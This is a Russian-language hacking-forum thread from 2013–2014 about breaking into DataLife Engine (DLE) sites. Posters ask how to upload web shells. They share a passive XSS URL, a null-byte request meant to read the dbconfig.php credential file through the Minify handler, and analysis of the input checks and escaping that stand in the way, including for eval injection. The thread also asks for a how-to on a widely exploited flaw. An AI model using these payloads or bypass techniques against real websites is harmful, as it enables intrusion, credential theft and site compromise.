ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

20.11.2013, 03:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
как нынче шелл заливают на стандартный dle ?
|
|
|
|

21.11.2013, 11:52
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме: 150479
Репутация:
2
|
|
Сообщение от ForcePush
ForcePush said:
Нашел пассивную XSS.
Код:
Code:
http://target.com/engine/modules/imagepreview.php?image=\x27\x3E[XSS]
Заменяем все специальные символы на \x[HEX код символа].
Работает по крайней мере на 9.8 + MQ=off, подробностей точно не знаю.
Баянист, /showpost.php?p=696945&postcount=18 - оригинал
|
|
|

21.11.2013, 19:22
|
|
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме: 23696
Репутация:
-4
|
|
В общем, по последней дырке такая песня:
Запрос (GET):
Код HTML:
HTML:
/engine/classes/min/index.php?f=engine/data/dbconfig.php
Обработчик, который всё обламывает:
engine\classes\min\lib\Minify\Controller\MinApp.ph p
А конкретно две проверки:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/^[^,]+\\.(css|js)(?:,[^,]+\\.\\1)*$/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]])[/COLOR][/COLOR]
и
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]realpath[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])[/COLOR][/COLOR]
Судя по описанию патча с целсофта запрос должен быть примерно такой:
Код HTML:
HTML:
engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
Регулярка обеспечивается .js, путь null byte..
описание атаки
Но чёт не доконца катит... Кстати, .htaccess, что в дирах /cache/system не позволят прочитать файл удалённо....
Так что это так, больше для развития, или пока не убьёшь эти файлы.
PS и ещё не получается обойти проверку (обратный слэш):
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'\\'[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
PSPS И самое интересное: гугл уже в июле это обсуждал ... Участники группы так и не смогли заюзать уязвимость
|
|
|

13.01.2014, 19:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 3698
Репутация:
2
|
|
Сообщение от slva2000
slva2000 said:
Но чёт не доконца катит... Кстати, .htaccess, что в дирах /cache/system не позволят прочитать файл удалённо....
Так что это так, больше для развития, или пока не убьёшь эти файлы.
А зачем их читать, когда сам Minify отдаёт?
Сообщение от slva2000
slva2000 said:
PS и ещё не получается обойти проверку (обратный слэш):
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'\\'[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
А где у Вас обратный слеш? У Вас %00.
Сообщение от slva2000
slva2000 said:
PSPS И самое интересное: гугл уже в июле
это обсуждал
... Участники группы так и не смогли заюзать уязвимость
Ага, ещё скажите, что на утреннике в детском саду участники так и не смогли...
Самое интересное, что уязвимость настолько глупая, что почти наверняка можно утверждать, что "разработчики DLE" её оставили специально
|
|
|
|

30.01.2014, 19:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 21252
Репутация:
15
|
|
Видел что eval вставляют в Автоматическая разбивка длинных слов , кто знает какой путь до него?
|
|
|
|

31.01.2014, 12:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
на 9.7 шелл залить можно как нибудь?
|
|
|
|

02.02.2014, 08:26
|
|
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме: 23696
Репутация:
-4
|
|
Сообщение от hpol
hpol said:
Видел что eval вставляют в Автоматическая разбивка длинных слов , кто знает какой путь до него?
если удастся обойти эти экранирования, то вполне
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"$"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"& #036;"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"{"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"& #123;"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"}"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"& #125;"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]chr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]chr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]92[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
|
|
|

04.02.2014, 21:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 179355
Репутация:
53
|
|
А в чем заключалась та уязвимость, через которую похакали кучу длешных сайтов? Есть у кого хауту?) Там что-то с аватарами вроде, не гуглится
|
|
|
|

06.02.2014, 07:56
|
|
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме: 23696
Репутация:
-4
|
|
Сообщение от justonline
justonline said:
А в чем заключалась та уязвимость, через которую похакали кучу длешных сайтов? Есть у кого хауту?) Там что-то с аватарами вроде, не гуглится
старая песня?
|
|
|

06.02.2014, 18:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме: 1246854
Репутация:
622
|
|
Сообщение от justonline
justonline said:
А в чем заключалась та уязвимость, через которую похакали кучу длешных сайтов? Есть у кого хауту?) Там что-то с аватарами вроде, не гуглится
это останется в привате, да же спустя год
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|